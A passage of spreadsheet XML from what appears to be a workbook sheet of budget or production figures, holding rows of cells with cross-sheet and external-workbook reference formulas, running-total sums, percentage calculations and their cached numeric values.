        <f>'[10]16'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]16'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'15'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'15'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]16'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]16'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]16'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]16'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]16'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]16'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]16'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]16'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]16'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]16'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]16'!$E$16</f>
        <v>3613</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'15'!H31</f>
        <v>75483</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1448490</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]16'!$I$16</f>
        <v>5169.9</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'15'!K31</f>
        <v>75867.11</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1431915.24</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]16'!$L$16</f>
        <v>65045.26</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>86.7270133333333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'[11]16'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]16'!$E$13</f>
        <v>6259</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'15'!H32</f>
        <v>78066</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1605909</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]16'!$I$13</f>
        <v>2772</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'15'!K32</f>
        <v>55928</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1077406</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]16'!$L$13</f>
        <v>73214.876</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>146.429752</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]16'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]16'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]16'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]16'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]16'!$U$76</f>
        <v>3.90625e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]16'!$V$76</f>
        <v>4.10714285714286e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]16'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]16'!$R$76</f>
        <v>1.5e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]16'!$S$76</f>
        <v>3.45e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]16'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'15'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]16'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'15'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]16'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]16'!$W$77</f>
        <v>0</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]16'!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]16'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]16'!$T$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]16'!$U$77</f>
        <v>2.60416666666667e-12</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]16'!$V$77</f>
        <v>60.2359523809538</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]16'!$Q$77</f>
        <v>1e-11</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]16'!$R$77</f>
        <v>1e-11</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]16'!$S$77</f>
        <v>5059.82000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]16'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'15'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]16'!$I$50</f>
        <v>1904.26</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'15'!K34</f>
        <v>9360.63</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>476563.56</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]16'!$L$15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'[11]16'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'15'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]16'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'15'!K35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G36+'15'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'15'!K36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G37+'15'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'15'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]16'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]16'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]16'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'15'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]16'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'15'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]16'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'15'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'15'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]16'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]16'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]16'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'15'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]16'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'15'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]16'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'15'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'15'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]16'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]16'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]16'!$R$50</f>
        <v>366.34</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'15'!U39</f>
        <v>4523.24</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>83336.839</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]16'!$V$50</f>
        <v>342</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'15'!X39</f>
        <v>4764</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>83523</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]16'!$Y$50</f>
        <v>990.786</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'15'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'15'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]16'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]16'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]16'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]16'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]16'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]16'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]16'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]16'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]16'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]16'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]16'!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'15'!H41</f>
        <v>8688</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>133664</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]16'!$I$16</f>
        <v>1324.51</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'15'!K41</f>
        <v>12453.71</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>133847.25</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]16'!$L$16</f>
        <v>22364.05</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>74.5468333333333</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]16'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]16'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]16'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'15'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]16'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'15'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]16'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]16'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]16'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'15'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]16'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'15'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]16'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]16'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]16'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]16'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'15'!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]16'!$V$8</f>
        <v>787</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'15'!X42</f>
        <v>10283</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>212754</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]16'!$Y$8</f>
        <v>7823.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]16'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]16'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'15'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]16'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'15'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]16'!$L$14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'[12]16'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'15'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]16'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'15'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]16'!$L$15</f>
        <v>60936.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]16'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]16'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]16'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'15'!U44</f>
        <v>5257</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>70010.168</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]16'!$V$29</f>
        <v>126</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'15'!X44</f>
        <v>2896</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>69306</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]16'!$Y$29</f>
        <v>4660.457</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]16'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'15'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]16'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'15'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]16'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]16'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]16'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]16'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]16'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]16'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]16'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]16'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]16'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'15'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'15'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]16'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]16'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]16'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'15'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]16'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'15'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]16'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'15'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'15'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]16'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]16'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]16'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'15'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]16'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'15'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]16'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'15'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'15'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]16'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]16'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]16'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'15'!U48</f>
        <v>555.83</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6582.36</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]16'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'15'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]16'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'15'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'15'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]16'!$P$8</f>
        <v>15340</v>
      </c>
